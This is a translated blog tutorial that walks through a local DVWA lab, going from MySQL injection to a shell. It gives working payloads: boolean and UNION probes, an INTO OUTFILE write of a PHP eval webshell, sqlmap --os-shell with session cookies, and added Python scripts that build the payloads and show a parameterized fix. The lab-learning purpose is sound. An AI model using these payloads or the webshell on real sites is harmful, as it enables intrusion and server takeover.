2025-01-30 Update From: SLTechnology News&Howtos, Network Security
Shulou (Shulou.com) 05/31 Report
Many newcomers are unclear about how to build a DVWA environment and go from MySQL injection to getting a shell. The walkthrough below explains it in detail for anyone who needs it; hopefully you will get something out of it.
Introduction
One day I went with my mentor to help with a penetration test of a website. After some testing I found a brute-force weakness and a few logic flaws that bypassed verification, and I hastily wrote the report. After a compliment, my mentor said he had got a shell on another site in the same C-class subnet through SQL injection. I said I had not found that IP when I scanned the C segment (an excuse born of frustration). Then I said that if I could find that system I could get a shell too, and one remark from my mentor stung a little: "You probably can't get a shell through MySQL injection."
He was right. The systems on our projects get tested dozens of times a month, and wherever I see a submitted parameter I just run sqlmap against it. My knowledge of the most basic manual injection was not solid, so I decided to build an environment and learn how to go from MySQL injection to a shell properly.
After looking up material I summarized it in this article, writing down my own thought process to share with beginners. I hope the experts will correct me, and that entry-level players are encouraged to build more learning environments and think more.
Build an environment
When we started learning, we studied all kinds of vulnerabilities (SQL injection, XSS, file upload and so on) by building DVWA, so when I thought about how to build an environment for injection, DVWA was the first idea. The tutorials one usually sees only show how to reproduce the vulnerability at the low, medium and high security levels, so why not get a shell through that same injection? I set up the environment to try it.
STEP 1: Have the required files ready; both can be downloaded for free.
1) XAMPP integrated environment
2) DVWA package
STEP 2: Install and start XAMPP. Apache may fail to start if its default ports (80 and 443) are already in use; change them to unoccupied ports in Apache's configuration (the Listen directive in httpd.conf, and httpd-ssl.conf for the SSL port). Here they were changed to 8081 and 4433.
Extract DVWA and put it in the htdocs directory under the XAMPP directory.
STEP 3: The environment is now built. Browse to it, log in, and you can see the various vulnerability environments.
Reference: there are detailed guides to building this environment on this site and elsewhere on the Internet. If you cannot build it successfully by following the steps above, search and solve the problem on your own.
Link: http://www.freebuf.com/sectool/102661.html
Vulnerability exploitation-manual
The idea behind manual injection to getshell:
1) Determine whether injection exists and whether it is string (character) or numeric injection.
2) Then use SQL statements to manipulate files on disk. MySQL makes it easy to read files because it provides functions such as load_file(), and if the database and the website are installed on the same server it is easy to write a webshell with SELECT ... INTO OUTFILE. Two conditions must hold for this to work: the database account needs the FILE privilege, and the secure_file_priv setting must not restrict writes to the target directory (check it with SELECT @@secure_file_priv; an empty value means no restriction, NULL means file writes are disabled). You also need to know the absolute path of the web root.
Vulnerability exploitation
STEP 1: Enter 1 and the query succeeds.
Enter 1' and '1'='2 and the query fails; the result is empty.
Enter 1' or '1234'='1234 and the query succeeds, which shows there is injection. Since the payload had to close a single quote to take effect, this is string (character) injection.
Let's look at how the low level builds the database query by reading the source. At the low security level DVWA takes the id parameter straight from the request and splices it into the query as SELECT first_name, last_name FROM users WHERE user_id = '$id'; with no filtering at all.
Splice the payload that just succeeded into that query and the reason becomes clear.
The principle is simple: the WHERE clause is a conditional test. If the condition is true for a row, that row is returned; if it is false for every row, nothing comes back. From the truth table for OR we learned in high school, true OR anything is true, so user_id = '1' or '1234' = '1234' is true for every row in the table, and the first payload, user_id = '1' and '1' = '2', is false for every row, which is exactly what we observed.
STEP 2: UNION queries
Most SQL queries contain a single SELECT that returns data from one or more tables (for example, entering 1 at id returns one result). But SQL also allows several SELECT statements to be executed and their results returned as one result set. These combined queries are called UNION or compound queries, and all common databases support them. Using UNION is simple: write each SELECT and put the UNION keyword between them, and the individual result sets are merged and returned together. The one rule to remember is that every SELECT in the union must return the same number of columns; otherwise the database rejects the statement.
An example to illustrate:
1) Enter 1 at id and one result is returned.
2) Enter 1' union select 1,2# at id. DVWA's query selects two columns (first_name and last_name), so the second SELECT also supplies two values, and the trailing # comments out the closing quote that the application appends. You can see that two SELECT queries were executed in the database
and two results were returned at the same time: the real row for user 1 and a row containing 1 and 2.
STEP 3: Use the UNION query to call MySQL's built-in functions and operate on files on disk.
1) Enter a payload of the form 1' union select 1,'<one-line PHP webshell>' into outfile 'C:\\xampp\\htdocs\\dvwa\\1.php'# so that INTO OUTFILE writes the result set, including the webshell text, to a file named 1.php under the web root (note that MySQL treats a backslash inside a string literal as an escape character, so Windows backslashes must be doubled, or forward slashes used instead). If you get an error, find out why.
2) The error message shows that the single quote was closed early. The classic one-line shell uses single quotes around its $_POST key, and those quotes terminate the SQL string literal that is supposed to contain the shell. Because I had been learning Python a while before, I decided to change the single quotes inside the shell to double quotes.
1' union select 1,'<?php @eval($_POST["cmd"]); ?>' into outfile 'C:\\xampp\\htdocs\\dvwa\\1.php'# (the parameter name cmd is just an illustration; before I realised that the quotes inside the SQL string had to be double quotes it was torture: all kinds of closed single quotes, all kinds of errors, all kinds of stubborn attempts, and I even wrongly suspected I had no permission to write the file.)
3) No error this time. Success? Check the directory: 1.php is there. Connect with China Chopper (the "kitchen knife" webshell client) right away. Satisfying, even if not as thrilling as a real environment, it is a success after all.
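The three manual steps above, as an added example that is not code from the original article or from DVWA. SQLite stands in for MySQL so the script runs offline: the query shape is the real one DVWA's low level builds, the users rows are constructed sample data, the union payload ends with `-- ` because SQLite has no MySQL-style `#` comment, and the one-line webshell and its `cmd` parameter name are illustrative. Step 3 (INTO OUTFILE) is MySQL-only, so the function only builds that payload and enforces the quoting rule the article discovered the hard way; a parameterized query is shown alongside as the fix.

```python
"""DVWA low-level SQL injection, steps 1-3, simulated with SQLite.

Added example; not the article's code nor DVWA's. The query string is the
one DVWA's low level builds ("... WHERE user_id = '$id'"); the users rows
are constructed sample data. SQLite has no MySQL-style '#' comment, so the
union payload ends with '-- ' instead. INTO OUTFILE is MySQL-only: the
payload for it is only built and checked here, never executed.
"""
import sqlite3

# Constructed sample data in the shape of DVWA's users table.
SAMPLE_USERS = [(1, "admin", "admin"), (2, "Gordon", "Brown")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_query(conn, user_input):
    """Same splicing as DVWA low: the input lands inside the single quotes."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_input}'"
    return conn.execute(sql).fetchall()


def safe_query(conn, user_input):
    """Hardened form: a bound parameter can never become part of the SQL."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_input,)).fetchall()


# Step 1: boolean probes. Each value is the row list the page would render.
def probe_injection(conn):
    return {
        "normal": vulnerable_query(conn, "1"),
        "false": vulnerable_query(conn, "1' and '1'='2"),        # WHERE false for every row
        "true": vulnerable_query(conn, "1' or '1234'='1234"),    # tautology: every row matches
    }


# Step 2: UNION. The second SELECT must return as many columns as the first
# (two here), or the database rejects the statement.
def union_probe(conn):
    return vulnerable_query(conn, "1' union select 1,2-- ")


# Step 3: the MySQL-only file write. The webshell becomes a string literal in
# the second column, so it must not contain the quote that delimits that
# literal; that is the error the article hit with a single-quoted shell.
def build_outfile_payload(webshell, webroot, filename="1.php"):
    if "'" in webshell:
        raise ValueError("webshell contains a single quote, which would close the SQL string")
    # MySQL treats backslash as an escape inside string literals; forward
    # slashes are accepted on Windows and avoid having to double every backslash.
    path = webroot.replace("\\", "/").rstrip("/") + "/" + filename
    return f"1' union select 1,'{webshell}' into outfile '{path}'#"


# Illustrative one-line PHP shell; "cmd" is an arbitrary parameter name.
WEBSHELL = '<?php @eval($_POST["cmd"]); ?>'

if __name__ == "__main__":
    db = make_db()
    for name, rows in probe_injection(db).items():
        print(f"{name:>6}: {rows}")
    print(" union:", union_probe(db))
    print("  safe:", safe_query(db, "1' or '1234'='1234"))
    print("step 3:", build_outfile_payload(WEBSHELL, r"C:\xampp\htdocs\dvwa"))
```

Two details worth knowing when you run the real step 3 against MySQL: the file MySQL writes contains the whole result row, so 1.php starts with the literal 1, a tab, and then the shell text; PHP ignores everything outside the php tags, so the shell still executes. And if the write silently produces no file, check SELECT @@secure_file_priv and the FILE privilege before suspecting the quoting.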
Manual testing ends here. A tool addict like me had to find a way to do it with tools as well.
Vulnerability exploitation-tools
The most common tool for exploiting SQL injection is sqlmap. Everyone who does penetration testing has a copy; as soon as they know there is SQL injection, they grab it and run it.
STEP 1: Discover the injection and exploit it.
URL: http://127.0.0.1:8081/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#. Damn, it failed. From the 302 response that sqlmap reported, you can see the request was redirected to the login page during the test: DVWA requires a logged-in session, so sqlmap has to carry that session to test anything.
After some fiddling I learned to pass the session cookie with the --cookie option (DVWA keeps the session in PHPSESSID and the security level in a security cookie, so both should be copied from the logged-in browser), and the run succeeded.
STEP 2: Use sqlmap's --os-shell option to continue the attack. --os-shell obtains an interactive shell from the injection point, giving us an environment in which to run system commands, similar to cmd on Windows.
STEP 3: Choose the web language according to the target system. DVWA is written in PHP, so choose PHP, then choose option 2 to specify a custom upload location. To get a shell here you must know the absolute path of the site. Under Windows the backslash in C:\xampp\htdocs\dvwa must be escaped by doubling it.
STEP 4: The os-shell is obtained, and two PHP files have been uploaded to the web directory. Visiting them shows that they provide an upload point for uploading webshell files.
STEP 5: Use this upload point to upload 2.php containing a PHP one-line shell (if you know PHP you can write one yourself; otherwise look one up), then connect with China Chopper to get a shell.
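A pre-flight check for the step where sqlmap failed with a 302, added here as an example that is not from the article or from sqlmap. It sends the same request sqlmap would, without following redirects, and reports whether the cookie is accepted (HTTP 200) or the application bounces you to login (HTTP 302). Because it has to run offline, a small stub that mimics DVWA's session check is embedded; the stub, its goodsession value and its response bodies are constructed. Against a real DVWA you would pass the PHPSESSID and security cookies copied from your browser, and the same string then goes to sqlmap's --cookie option.

```python
"""Check that a DVWA session cookie works before handing the URL to sqlmap.

Added example, not from the article or from sqlmap. probe() issues one GET
without following redirects, which is how you see the 302 that sqlmap
reported. The stub server below stands in for DVWA: with a valid PHPSESSID
it answers 200 with the sqli page, otherwise 302 to login.php. Its
"goodsession" value and page body are constructed for this demo.
"""
import http.server
import threading
import urllib.error
import urllib.request


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Returning None makes urllib raise HTTPError for 3xx instead of following it."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def probe(url, cookie):
    """Return (status, Location header) for one request carrying the cookie."""
    opener = urllib.request.build_opener(NoRedirect)
    req = urllib.request.Request(url, headers={"Cookie": cookie})
    try:
        with opener.open(req, timeout=5) as resp:
            return resp.status, resp.headers.get("Location")
    except urllib.error.HTTPError as err:
        return err.code, err.headers.get("Location")


def cookie_ok(url, cookie):
    """True when the app serves the page instead of redirecting to login."""
    status, location = probe(url, cookie)
    return status == 200 and location is None


class _DvwaStub(http.server.BaseHTTPRequestHandler):
    """Constructed stand-in for DVWA's session check (not DVWA's code)."""

    def do_GET(self):
        if "PHPSESSID=goodsession" in self.headers.get("Cookie", ""):
            body = b"<pre>ID: 1<br />First name: admin<br />Surname: admin</pre>"
            self.send_response(200)
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)
        else:
            self.send_response(302)
            self.send_header("Location", "../../login.php")
            self.send_header("Content-Length", "0")
            self.end_headers()

    def log_message(self, *args):
        pass  # keep the demo output quiet


def start_stub():
    """Start the stub on a free loopback port; returns (server, sqli URL)."""
    srv = http.server.HTTPServer(("127.0.0.1", 0), _DvwaStub)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    port = srv.server_address[1]
    return srv, f"http://127.0.0.1:{port}/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit"


if __name__ == "__main__":
    srv, url = start_stub()
    print("without cookie:", probe(url, "security=low"))
    print("with cookie   :", probe(url, "security=low; PHPSESSID=goodsession"))
    srv.shutdown()
```

If cookie_ok returns False, sqlmap will see the same 302 on every request and conclude that nothing is injectable; fix the cookie first rather than blaming the injection point.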
Summary
My own learning and exploration involved far more than this, because building the environment and exploiting the vulnerability both throw up all sorts of problems that can only be solved by persistent exploration. For example, when injecting manually I lost time over whether a single quote was a full-width (Chinese) or ASCII (English) character, and over how to close the quotes. When attacking with sqlmap the cookie has to be added, and when getting the os-shell the backslashes have to be escaped. One mistake, one solution, and no giving up: that is what learning looks like, and ordinary penetration work is the same. Be patient, keep exploring, and improve your skills along the way. After all, experts are not made in a day.
Shortcoming
1) The environment is self-built and runs with high privileges, and there is no firewall, WAF or other security device to intercept anything. Real environments usually require evading several layers of protection.
2) The article does not cover attack usage under Linux, because os-shell has always been a sore point for me: how much privilege does the injection point actually have, and with that privilege, do I still need this step at all? Under Linux I did not exploit it successfully because I never solved the permission problem. Likewise, reading the experts' articles on listeners and reverse shells left me somewhat confused.